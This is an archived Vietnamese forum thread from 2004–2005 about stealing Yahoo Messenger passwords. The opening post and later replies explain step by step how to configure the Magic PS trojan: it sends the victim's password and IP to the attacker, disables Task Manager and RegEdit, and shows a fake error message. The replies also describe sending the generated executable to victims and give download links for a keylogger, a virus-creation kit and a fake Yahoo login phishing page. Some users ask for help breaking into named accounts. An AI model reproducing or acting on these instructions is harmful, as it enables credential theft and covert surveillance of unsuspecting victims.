PDA

View Full Version : chương trình ăn cắp mật mã

tuantinh87
15-08-2004, 10:13
Chương trình ăn cắp password yahoo. Dung lượng 79,4 kb , có nhiều tính năng hơn magic 141 cách sữ dụng rất đơn giản Chạy file magic_ps_1.42.exe .Send Y!Mess Pass :Nếu chọn cái này nó sẽ gửi Y!M cho bạn khi victim login
Send IP:Nếu chọn nó sẽ gửi IP cho bạn khi victim login
Disable taskmgr xp-2k :Bạn chọn mục này thì khi victim đánh tổ hợp phím Ctrl+Alt+Delete sẽ không thấy Task Manager nó sẽ bị ẩn nên không sử dụng được
Disable Y! save pass : Nó sẽ tắt chức năng Save pass
Send OS Name : Chọn mục này thì nó sẽ gởi cho bạn biết là máy của Victim đang sử dụng là hệ điều hành gì.
Auto Startup : Chọn phần này là chương trình này sẽ tự khởi động khi mở máy.
Disable RegEdit : Chọn phần này là thì khi Victim vào Run đánh lệnh RegEdit thì sẽ không thực hiện lệnh này.
Delete Mess Archive : Nó sẽ xóa Mess Archive
Fake Error Message : Chọn phần này để đánh lừa victim khi download chương trình này về nó sẽ báo lỗi là window không thể mở file này nhưng thật sự là chúng ta đạt được mục đích cài con virus này rồi đó.
Đây là 2 cái cần quan tâm nhất là
Messenger:Là dùng để nói câu báo lỗi.Ví dụ:Can not open this file. please download again ! -> bạn có thể điền bất kỳ câu nào khác để đánh lừa vitim
Y!ID:Nick mà bạn dùng để cho magic_ps_142.exe gửi về
Mps creator (Nghĩa là bạn muốn password khi lấy được sẽ gởi về nick này. Mỗi lần bạn vào chat thì password sẽ gởi về cho bạn dưới dạng Message ).
Click vào create MS nó sẽ tạo ra 1 file hình send file đó đi và khi victim login thì lập tức 1 messenger sẽ gửi đến cho bạn.
Cách xoá virus này: Banj dùng Antivirus để xóa nó (dùng Antivirus 2004 là tốt hơn hết, cần thiết bạn nên đặt pass cho anti đễ bọn ác ko thể tắc). hay dùng 1 cách khác

Bạn vào Start/Run rồi đánh chữ Msconfig
Bạn chọn StartUP
Bạn chọn Disable All rồi chọn OK sau đó khởi động lại máy .

DOWNLOAD here http://www.freewebs.com/nguyenkhoa/FamilyKeylogger.zip

YenThanh_anhhungsovo
19-08-2004, 02:11
theo cách này của các hạ thì chỉ có lấy được pass của những người trong gia đinh thôi ehhehhe, cái địa chỉ đấy của các hạ là link dowload chương trình familykeylogger chứ không phải magic_ps hehhehe
các hạ đi lấy bài ở các trang khác thì cũng phải biến của nó thành của mình chứ đây lại cứ copy nguyên bài của người khác vào mà trả hiểu gì cả

baby_fish19862004
24-08-2004, 10:57
heehehehehehehe thăng đệ có câu nói hơi bị hay đấy chưa gì đã bóc mẽ người ta rồi đúng là thằng đểu đã thế ta sẽ bóc mẽ thằng đệ cho coi cho sợ luôn ko bao giơ dám nói nhiêu heheeheheheheheheh.............Nhớ đấy

YenThanh_anhhungsovo
24-08-2004, 13:45
to baby_fish19862004: chỗ này là diễn đàn chứ không phải là chỗ thằng đệ ăn nói linh tinh biết chưa, đây là người ta bàn luận về kiến thức tin học còn thằng đệ lại cứ vào nói lung ta lung tung, chẳng có chủ đề gi cả

baby_fish19862004
24-08-2004, 15:21
ai ko có chủ đề gì hay la huynh nói xấu người ta hả huynh tự làm như thế trước chư có phải đệ dâu .Huynh cứ để cho họ tự làm xem có ăn cắp được pass ko .Anh có bài ăn cắp pass ơi giúp em ăn cắp pass của nick only_love_1999 xem hyunh ăn cắp được ko nha

loveyoumorethanicansay
30-08-2004, 10:52
các bác vô đay mà downlload con magic1.5 đi này

http://data.forumhoster.com/forum_hvastudent/index.php?s=0f5a53b2408941a24b567fd84eab93e9&showt opic=27

TrienChieu
30-08-2004, 23:32
này đường link đấy là Magic PS 142 chứ có phải là 1.5 đâu, có tải nó về để gửi virus trojan thì cũng bị norton antivirus quét bay trước khi lấy được pass
nhưng anh em cũng có thể tham khảo:
trong ô Y! ID: anh em nhập địa chỉ ID nào của mình muốn pass gửi về ID đó
trong ô MPS creator
chọn filename là gì thì tuỳ nhưng nên để mặc định là: sender.exe sau đó ấn vào create MPS thì trong thư mục chứa Magic PS sẽ xuất hiện một file đó
bây giờ chỉ cần gửi file đó cho victim trong yahoo mess là OK
chúc thành công(với đk máy nạn nhân không cài NAV)

Lanh Dien Ta Nhan
01-09-2004, 19:25
Thế anh em có trương trình gì mới không, ăn cắp cái được ngay đi đỡ phải tốn công cãi nhau mãi. Chứ tui thấy vẫn nhứng trương trình cũ không có gì mới cả. Nếu có thì pót nên cho mọi người cùng xem chứ. Cãi nhau làm gì

TrienChieu
01-09-2004, 22:53
các hạ muốn có chương trình hay và ăn cắp được ngay thì tự tạo ra con virus đấy nha
trong đây có chương trình tự tạo virus nè: vào dowload về chế ra virus mới www.lord-loisel.tk

gianghodammau_emchangso_
12-09-2004, 17:40
trui` ui! dau long` qua . nan nhan cua tro` lay pass ne . ko hieu nhung tay hacker do lay pass de an qua ngay hay sao ma cung lay nhi ? dien that do >_< hu hu hu

flame dragon
12-09-2004, 21:22
thời đại này ko xài virus được đâu
bị quét hết
chỉ có 2 loại còn tốt là con spy mới ra lò và fake login
hiện tại cái link down spy của tại hạ die rồi nên ko đưa lên cho các vị
còn link fake login là
http://www.freewebs.com/buuthiepa10/greetingcards.htm
muốn hack ai thì dụ người đó dzô đó rồi nói với họ đăng nhập vào như đang nhập yahoo
sau đó post nick người mình dụ lên
nếu thấy trong mail có kết quả thì tại hạ sẽ đưa pass lên cho mọi người!

lsb_votinh
29-09-2004, 21:28
Các bác ơi ! Giúp em hack pass này với [email protected]

lsb_lamthainghia
24-10-2004, 16:45
cac' huynh ui! de bi thang ban no doi pass cua minh de hong bit lam the nao nua noi no la pass the nao no cung ko chiu bi gio de nho cac huynh giup de lay lai nha. nick cua de la anh_nghi_em_ko_con_yeu_anh cac huynh giup de nha.de dang buon lam ma` cung tuc nua chi muon khoc thui huhuhuhuhuhu

lsb_lamthainghia
24-10-2004, 16:49
cac' huynh ui! de bi thang ban no doi pass cua minh de hong bit lam the nao nua noi no la pass the nao no cung ko chiu bi gio de nho cac huynh giup de lay lai nha. nick cua de la [email protected] cac huynh giup de nha.de dang buon lam ma` cung tuc nua chi muon khoc thui huhuhuhuhuhu

chotroinuocmat
28-01-2005, 19:58
trời sao kinh khủng vậy mình thì không biết làm gì cả minh có thể học hỏi các bạn với được không vậy

lsb_vodanh
30-01-2005, 08:45
nè huynh gi đó ơi
chế lẹ lẹ đi cho anh em nhờ với tui bị mất passwod rồi
mà không có cách chi lấy được cả
chỉ cho tui với đi
ních đó rất quan trọng với tui đó
giúp dùm đi nghe